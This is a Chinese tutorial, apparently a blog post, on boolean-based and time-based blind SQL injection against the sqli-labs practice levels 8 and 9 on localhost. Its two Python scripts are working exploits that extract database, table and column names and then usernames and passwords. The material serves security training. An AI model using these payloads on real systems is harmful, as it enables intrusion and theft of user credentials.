SQL布尔盲注、时间盲注
一、布尔盲注
布尔盲注(Boolean-based Blind SQL Injection)是一种SQL注入技术,用于在应用程序不直接显示数据库查询结果的情况下,通过构造特定的SQL查询并根据页面返回的不同结果来推测数据库中的信息。这种方法依赖于SQL查询的结果是否为真或假,进而推断出数据库中的具体信息。
案例为sqlilabs中的第八关,采用二分查找
python脚本:
import requests
def get_database(URL):
# 获取数据库名称
s = ""
for i in range(1, 10):
low = 32
high = 128
mid = (low + high) // 2
while (high > low):
payload = {
"id": f"1' and greatest(ascii(substr(database(),{i},1)),{mid})={mid} -- "} # 相当于第一个字符<={mid}条件判断为真
res = requests.get(url=URL, params=payload)
if "You are in" in res.text:
high = mid
mid = (low + high) // 2
else:
low = mid + 1
mid = (low + high) // 2
s += chr(mid)
print("数据库名称:" + s)
def get_table(URL):
# 获取表名称
s = ""
for i in range(1, 32):
low = 32
high = 128
mid = (low + high) // 2
while (high > low):
payload = {
"id": f"1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid} -- "}
res = requests.get(url=URL, params=payload)
if "You are in" in res.text:
low = mid + 1
mid = (low + high) // 2
else:
high = mid
mid = (low + high) // 2
s += chr(mid)
print("表的名称:" + s)
def get_column(URL):
# 获取管理员的字段名称
s = ""
for i in range(1, 32):
low = 32
high = 128
mid = (low + high) // 2
while (high > low):
payload = {
"id": f"1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid} -- "}
res = requests.get(url=URL, params=payload)
if "You are in" in res.text:
low = mid + 1
mid = (low + high) // 2
else:
high = mid
mid = (low + high) // 2
s += chr(mid)
print("users表的列:" + s)
def get_result(URl):
# 获取用户名和密码信息
s = ""
for i in range(1, 32):
low = 32
high = 128
mid = (low + high) // 2
while (high > low):
payload = {
"id": f"1' and ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid} -- "}
res = requests.get(url=URL, params=payload)
if "You are in" in res.text:
low = mid + 1
mid = (low + high) // 2
else:
high = mid
mid = (low + high) // 2
s += chr(mid)
print("users表具体数据:" + s)
if __name__ == '__main__':
URL = "http://127.0.0.1/sqlilabs/Less-8/index.php"
get_database(URL)
get_table(URL)
get_column(URL)
get_result(URL)运行结果
二、时间盲注
时间盲注(Time-based Blind SQL Injection)是一种SQL注入技术,用于在应用程序没有直接回显数据库查询结果的情况下,通过构造特定的SQL查询来推测数据库中的信息。这种方法依赖于数据库处理查询时产生的延迟响应来判断条件的真假。
案例为sqlilabs中的第九关,同样为二分查找
python脚本
import requests
import datetime
def get_database(URL):
# 获取数据库名称
s = ""
for i in range(1, 10):
low = 32
high = 128
mid = (low + high) // 2
while (high > low):
payload = {
"id": f"1' and if((greatest(ascii(substr(database(),{i},1)),{mid})={mid}),sleep(3),1) -- "} # 相当于第一个字符<={mid}条件判断为真
start = datetime.datetime.now()
res = requests.get(url=URL, params=payload)
end = datetime.datetime.now()
if (end - start).seconds >= 3:
high = mid
mid = (low + high) // 2
else:
low = mid + 1
mid = (low + high) // 2
s += chr(mid)
print("数据库名称:" + s)
def get_table(URL):
# 获取表名称
s = ""
for i in range(1, 32):
low = 32
high = 128
mid = (low + high) // 2
while (high > low):
payload = {
"id": f"1' and if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),sleep(3),1) -- "}
start = datetime.datetime.now()
res = requests.get(url=URL, params=payload)
end = datetime.datetime.now()
if (end - start).seconds >= 3:
low = mid + 1
mid = (low + high) // 2
else:
high = mid
mid = (low + high) // 2
s += chr(mid)
print("表的名称:" + s)
def get_column(URL):
# 获取管理员的字段名称
s = ""
for i in range(1, 32):
low = 32
high = 128
mid = (low + high) // 2
while (high > low):
payload = {
"id": f"1' and if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),sleep(3),1) -- "}
start = datetime.datetime.now()
res = requests.get(url=URL, params=payload)
end = datetime.datetime.now()
if (end - start).seconds >= 3:
low = mid + 1
mid = (low + high) // 2
else:
high = mid
mid = (low + high) // 2
s += chr(mid)
print("users表的列:" + s)
def get_result(URl):
# 获取用户名和密码信息
s = ""
for i in range(1, 32):
low = 32
high = 128
mid = (low + high) // 2
while (high > low):
payload = {
"id": f"1' and if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),sleep(3),1) -- "}
start = datetime.datetime.now()
res = requests.get(url=URL, params=payload)
end = datetime.datetime.now()
if (end - start).seconds >= 3:
low = mid + 1
mid = (low + high) // 2
else:
high = mid
mid = (low + high) // 2
s += chr(mid)
print("users中的具体数据:" + s)
if __name__ == '__main__':
URL = "http://127.0.0.1/sqlilabs/Less-9/index.php"
# get_database(URL)
get_table(URL)
# get_column(URL)
# get_result(URL)运行结果:
